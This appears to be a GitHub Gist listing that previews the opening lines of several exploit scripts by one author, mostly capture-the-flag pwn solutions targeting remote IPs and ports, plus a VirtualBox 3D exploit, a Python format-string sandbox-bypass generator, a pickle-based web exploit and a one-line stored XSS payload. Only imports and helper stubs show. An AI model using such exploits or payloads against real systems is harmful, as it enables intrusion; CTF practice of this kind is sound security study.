View virtualbox_3d_exp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author : peternguyen93 | |
import sys | |
sys.path.append('../') # back to vboxlib module | |
from vboxlib.hgcm import * | |
from vboxlib.chromium import * | |
from ctypes import * | |
''' |
View 3pigs.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from struct import * | |
from base64 import b64encode,b64decode | |
import requests | |
import re | |
import hashlib | |
import random |
View bypass.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
target = 'UOTp%I()<>S' | |
out = '' | |
for c in target: | |
found = False | |
for func_name in dir("")[::-1]: | |
try: | |
doc = getattr(getattr("",func_name),"__doc__") | |
if c in doc: | |
idx = doc.find(c) | |
out += "{0.%s.__doc__[%d]}" % (func_name,idx) |
View mute_pig.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
p = Pwn(mode=1,host='47.75.128.158',port=9999) | |
def alloc(name,type): | |
p.sendint(1) | |
p.sendint(type) |
View python_revenge_exploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import cPickle | |
import sys | |
import os | |
import hashlib | |
from base64 import b64encode, b64decode | |
import string | |
import json | |
import flask |
View WhiteHat2017_objdump.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from Pwn import * | |
p = Pwn(mode=1) | |
def pA32(*args): | |
binary = '' | |
for arg in args: | |
binary += p.p32(arg) | |
return binary |
View ghost_in_the_heap.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
# p = Pwn(mode=1,port=8887) | |
p = Pwn(mode=1,host='52.193.196.17',port=56746) | |
def select(op): | |
p.read_until('Your choice: ') |
View hello.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert("Stored XSS"); |
View SGX_pwn.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>SGX PWN</title> | |
</head> | |
<body> | |
<h1>PWN!!!</h1> | |
<script type="text/javascript"> | |
function print(text) | |
{ |
View 1000levels.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import re | |
p = Pwn(host='47.74.147.103',port=20001,mode=1) | |
# p = Pwn(mode=1) | |
def exploit(**kargs): |
NewerOlder